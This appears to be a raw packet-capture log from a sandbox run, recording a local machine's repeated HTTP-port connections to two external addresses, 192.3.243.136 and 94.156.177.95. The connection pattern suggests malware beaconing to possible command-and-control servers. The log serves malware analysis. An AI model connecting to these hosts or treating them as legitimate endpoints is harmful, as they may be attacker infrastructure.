                                                                                                                Nov 15, 2024 18:14:26.470901012 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.125089884 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.125200033 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.125251055 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.125272989 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.125325918 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.125375032 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.125384092 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.125441074 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.125478029 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.125488997 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.125540018 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.125582933 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.125587940 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.125638962 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.125688076 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.130619049 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.130671024 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.130722046 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.242325068 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.242376089 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.242449999 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.242470026 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.242520094 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.242568016 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.242572069 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.242620945 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.242671013 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.242671013 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.242671013 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.242717981 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.242763042 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.242840052 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.242888927 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.242938042 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.242938995 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.243258953 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.243309021 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.243360043 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.243412018 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.243458986 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.243458986 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.243510008 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.243557930 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.244294882 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.244362116 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.244409084 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.244422913 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.244489908 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.244524002 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.244600058 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.245094061 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.245142937 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.247881889 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.247931957 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.247989893 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.247997046 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.248040915 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.248089075 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.359273911 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.359353065 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.359376907 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.359435081 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.359519958 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.359541893 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.359541893 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.359569073 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.359616995 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.359617949 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.359668970 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.359715939 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.359719038 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.359771013 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.359818935 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.359838009 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.359904051 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.359946966 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.359951973 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.360012054 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360061884 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360063076 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.360111952 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360161066 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.360161066 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360212088 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360259056 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.360259056 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360308886 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360353947 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.360358000 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360402107 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360450983 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.360467911 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360517025 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360563993 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.360580921 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360631943 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360680103 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.360696077 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360752106 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360799074 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.360800982 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360852003 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360898018 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.360898018 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360949039 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.360995054 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.360997915 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.361397028 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.361447096 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.361464977 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.361532927 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.361577988 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.361582994 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.361632109 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.361676931 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.361680031 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.361730099 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.361788034 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.361946106 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.361979008 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.361998081 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.362051010 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.362068892 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.362118006 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.362118959 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.362170935 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.362215996 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.362219095 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.362270117 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.362317085 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.365907907 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.365988970 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.366040945 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.476334095 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.476412058 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.476463079 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.476507902 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.476543903 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.476613998 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.476680040 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.476684093 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.476733923 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.476749897 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.476824045 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.476871967 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.476875067 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.476943016 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.476991892 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.477010012 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477081060 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477130890 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.477147102 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477191925 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477237940 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.477237940 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477288961 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477336884 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.477340937 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477390051 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477437019 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477438927 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.477488041 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477535963 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.477535963 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477586985 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477633953 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477636099 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.477684021 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477730989 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.477730989 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477782965 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477828979 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.477829933 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477880001 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477932930 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.477932930 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.477984905 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.478033066 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.478034019 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.478086948 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.478135109 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.478135109 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.478188038 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.478234053 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.478234053 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.478283882 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.478332043 CET8049738192.3.243.136192.168.2.4
                                                                                                                Nov 15, 2024 18:14:27.478332996 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.526846886 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:27.578052998 CET4973880192.168.2.4192.3.243.136
                                                                                                                Nov 15, 2024 18:14:28.575795889 CET4973980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:28.580916882 CET804973994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:28.581056118 CET4973980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:28.583125114 CET4973980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:28.588072062 CET804973994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:28.588136911 CET4973980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:28.592991114 CET804973994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:29.538896084 CET804973994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:29.539078951 CET4973980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:29.544429064 CET804973994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:29.544519901 CET4973980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:29.684192896 CET4974080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:29.689404011 CET804974094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:29.689667940 CET4974080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:29.691334963 CET4974080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:29.696491003 CET804974094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:29.696597099 CET4974080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:29.701514959 CET804974094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:30.671838045 CET804974094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:30.675329924 CET4974080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:30.680830002 CET804974094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:30.683346987 CET4974080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:30.781533003 CET4974180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:30.786735058 CET804974194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:30.787137985 CET4974180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:30.789119005 CET4974180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:30.794045925 CET804974194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:30.795104027 CET4974180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:30.800123930 CET804974194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:31.757117987 CET804974194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:31.757246971 CET4974180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:31.762597084 CET804974194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:31.762654066 CET4974180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:31.907341957 CET4974280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:31.912398100 CET804974294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:31.912606001 CET4974280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:31.914752960 CET4974280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:31.919687033 CET804974294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:31.919894934 CET4974280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:31.924792051 CET804974294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:32.888520002 CET804974294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:32.891366005 CET4974280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:32.896680117 CET804974294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:32.899259090 CET4974280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:33.045938969 CET4974380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:33.050901890 CET804974394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:33.051126957 CET4974380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:33.052884102 CET4974380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:33.057790041 CET804974394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:33.059120893 CET4974380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:33.064002991 CET804974394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:34.033890963 CET804974394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:34.034010887 CET4974380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:34.039377928 CET804974394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:34.039442062 CET4974380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:34.167010069 CET4974480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:34.172228098 CET804974494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:34.172311068 CET4974480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:34.174204111 CET4974480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:34.179152966 CET804974494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:34.179210901 CET4974480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:34.184091091 CET804974494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:35.158873081 CET804974494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:35.159054041 CET4974480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:35.164578915 CET804974494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:35.164639950 CET4974480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:35.313637972 CET4974580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:35.318717003 CET804974594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:35.319061995 CET4974580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:35.320996046 CET4974580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:35.325886965 CET804974594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:35.327061892 CET4974580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:35.332037926 CET804974594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:36.284205914 CET804974594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:36.284393072 CET4974580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:36.290488958 CET804974594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:36.290735006 CET4974580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:36.455888033 CET4974680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:36.461648941 CET804974694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:36.461724997 CET4974680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:36.464710951 CET4974680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:36.470540047 CET804974694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:36.470587015 CET4974680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:36.476448059 CET804974694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:37.438709974 CET804974694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:37.443015099 CET4974680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:37.448793888 CET804974694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:37.448870897 CET4974680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:37.599594116 CET4974780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:37.605470896 CET804974794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:37.605551004 CET4974780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:37.607319117 CET4974780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:37.613138914 CET804974794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:37.613187075 CET4974780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:37.619311094 CET804974794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:38.600548983 CET804974794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:38.600814104 CET4974780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:38.608489990 CET804974794.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:38.608566046 CET4974780192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:38.754971027 CET4974880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:38.760004044 CET804974894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:38.760090113 CET4974880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:38.762506008 CET4974880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:38.767359972 CET804974894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:38.767432928 CET4974880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:38.772278070 CET804974894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:39.761516094 CET804974894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:39.761617899 CET4974880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:39.766951084 CET804974894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:39.767014980 CET4974880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:39.903601885 CET4974980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:39.908783913 CET804974994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:39.908873081 CET4974980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:39.910825968 CET4974980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:39.915734053 CET804974994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:39.915788889 CET4974980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:39.920623064 CET804974994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:40.866601944 CET804974994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:40.866806984 CET4974980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:40.872267962 CET804974994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:40.872329950 CET4974980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:41.009273052 CET4975080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:41.014961004 CET804975094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:41.015047073 CET4975080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:41.016753912 CET4975080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:41.021755934 CET804975094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:41.021819115 CET4975080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:14:41.026712894 CET804975094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:42.015927076 CET804975094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:14:42.016290903 CET4975080192.168.2.494.156.177.95
